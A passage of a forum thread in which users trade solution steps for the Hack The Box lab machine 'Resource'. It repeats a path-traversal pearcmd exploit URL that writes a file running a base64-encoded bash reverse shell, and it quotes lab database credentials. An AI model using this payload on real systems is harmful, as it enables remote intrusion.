[HTB] Resource
by UnkownWombat - Saturday August 3, 2024 at 06:05 PM
#51
(Aug 04, 2024, 06:08 AM)b2synapse Wrote:
(Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way

/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php

Just replace the base64 paylaod with your reverse shell base64 encoded


Where can i find the tmp/hello.php?

GET /index.php/?page=../../../../../../../../tmp/hello
Reply
#52
db.php has this:

$dsn = "mysql:host=db;dbname=resourcecenter;";
$dbusername = "jj";
$dbpassword = "ugEG5rR5SG8uPd";
Reply
#53
(Aug 04, 2024, 06:14 AM)glock05 Wrote:
(Aug 04, 2024, 06:08 AM)b2synapse Wrote:
(Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way

/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php

Just replace the base64 paylaod with your reverse shell base64 encoded


Where can i find the tmp/hello.php?


help mine shell isn't rolled back

GET /index.php/?page=../../../../../../../../tmp/hello
Reply
#54
(Aug 04, 2024, 06:28 AM)Lucifer097 Wrote:
(Aug 04, 2024, 06:14 AM)glock05 Wrote:
(Aug 04, 2024, 06:08 AM)b2synapse Wrote:
(Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way

/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php

Just replace the base64 paylaod with your reverse shell base64 encoded


Where can i find the tmp/hello.php?


help mine shell isn't rolled back

GET /index.php/?page=../../../../../../../../tmp/hello

listen with nc

visit /index.php/?page=../../../../../../../../tmp/hello
Reply
#55
thanks @glock05 it worked just some texts worng i have ut so thats why
Reply
#56
(Aug 04, 2024, 06:36 AM)Lucifer097 Wrote: thanks @glock05 it worked just some texts worng i have ut so thats why

That's awesome glad it helped Smile
Reply
#57
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's  a log file with creds. Smile

how did you see?
Reply
#58
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's  a log file with creds. Smile

Damm  i looked to that file, how did you noticed creds?
Reply
#59
(Aug 04, 2024, 06:44 AM)jsvensson Wrote:
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's  a log file with creds. Smile

Damm  i looked to that file, how did you noticed creds?

search for "pass"
Reply
#60
(Aug 04, 2024, 06:46 AM)glock05 Wrote:
(Aug 04, 2024, 06:44 AM)jsvensson Wrote:
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's  a log file with creds. Smile

Damm  i looked to that file, how did you noticed creds?

search for "pass"


How did u figured out that vulnerability ../../shell ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,778 9 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,968 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,976 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,627 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,275 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)